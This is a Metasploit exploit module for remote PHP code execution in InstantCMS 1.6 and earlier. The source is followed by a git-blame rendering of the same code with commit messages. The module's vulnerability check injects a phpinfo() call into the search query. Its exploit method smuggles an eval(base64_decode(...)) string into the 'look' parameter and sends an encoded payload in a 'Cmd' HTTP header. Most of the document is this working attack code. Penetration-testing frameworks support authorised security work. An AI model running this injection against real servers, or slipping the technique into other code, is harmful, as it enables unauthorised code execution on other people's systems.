metasploit-framework/modules/exploits/unix/webapp/instantcms_exec.rb

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'InstantCMS 1.6 Remote PHP Code Execution',
      'Description'    => %q{
        This module exploits an arbitrary PHP command execution vulnerability because of a
        dangerous use of eval() in InstantCMS in versions 1.6 and prior.
      },
      'Author'         =>
        [
          'AkaStep', # Vulnerability discovery and PoC
          'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '60816' ],
          [ 'URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html' ]
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch' => ARCH_PHP,
      'Targets'        =>
        [
          [ 'InstantCMS 1.6', { }  ],
        ],
      'DisclosureDate' => 'Jun 26 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.to_s),
      'vars_get' =>
      {
        'view'	=> 'search',
        'query' => '${echo phpinfo()}'
      }
    })

    if res and res.body.match(/Build Date/)
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit

    print_status("Executing payload...")

    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.to_s),
      'vars_get' =>
      {
        'view'	=> 'search',
        'query' => rand_text_alpha(3 + rand(3)),
        'look'  => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"
      },
      'headers' => {
        'Cmd' => Rex::Text.encode_base64(payload.encoded)
      }
    })

  end
end
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`require 'msf/core'`


			`class Metasploit3 < Msf::Exploit::Remote`

Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`
Improve and clean instantcms_exec 2013-07-03 16:37:57 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',`
			`'Description' => %q{`
			`This module exploits an arbitrary PHP command execution vulnerability because of a`
			`dangerous use of eval() in InstantCMS in versions 1.6 and prior.`
			`},`
			`'Author' =>`
			`[`
			`'AkaStep', # Vulnerability discovery and PoC`
			`'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module`
			`'juan vazquez' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'BID', '60816' ],`
			`[ 'URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html' ]`
			`],`
			`'Privileged' => false,`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' =>`
			`[`
			`[ 'InstantCMS 1.6', { } ],`
			`],`
			`'DisclosureDate' => 'Jun 26 2013',`
			`'DefaultTarget' => 0))`
Improve and clean instantcms_exec 2013-07-03 16:37:57 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])`
			`], self.class)`
			`end`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def check`
			`res = send_request_cgi({`
			`'uri' => normalize_uri(target_uri.to_s),`
			`'vars_get' =>`
			`{`
			`'view' => 'search',`
			`'query' => '${echo phpinfo()}'`
			`}`
			`})`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
Saving progress Progress group 3: Making sure these checks comply with the new guidelines. Please read: "How to write a check() method" found in the wiki. 2014-01-21 19:03:36 +00:00			`if res and res.body.match(/Build Date/)`
			`return Exploit::CheckCode::Vulnerable`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
Saving progress Progress group 3: Making sure these checks comply with the new guidelines. Please read: "How to write a check() method" found in the wiki. 2014-01-21 19:03:36 +00:00			`Exploit::CheckCode::Safe`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Executing payload...")`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`res = send_request_cgi({`
			`'uri' => normalize_uri(target_uri.to_s),`
			`'vars_get' =>`
			`{`
			`'view' => 'search',`
			`'query' => rand_text_alpha(3 + rand(3)),`
			`'look' => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"`
			`},`
			`'headers' => {`
			`'Cmd' => Rex::Text.encode_base64(payload.encoded)`
			`}`
			`})`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`end`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`end`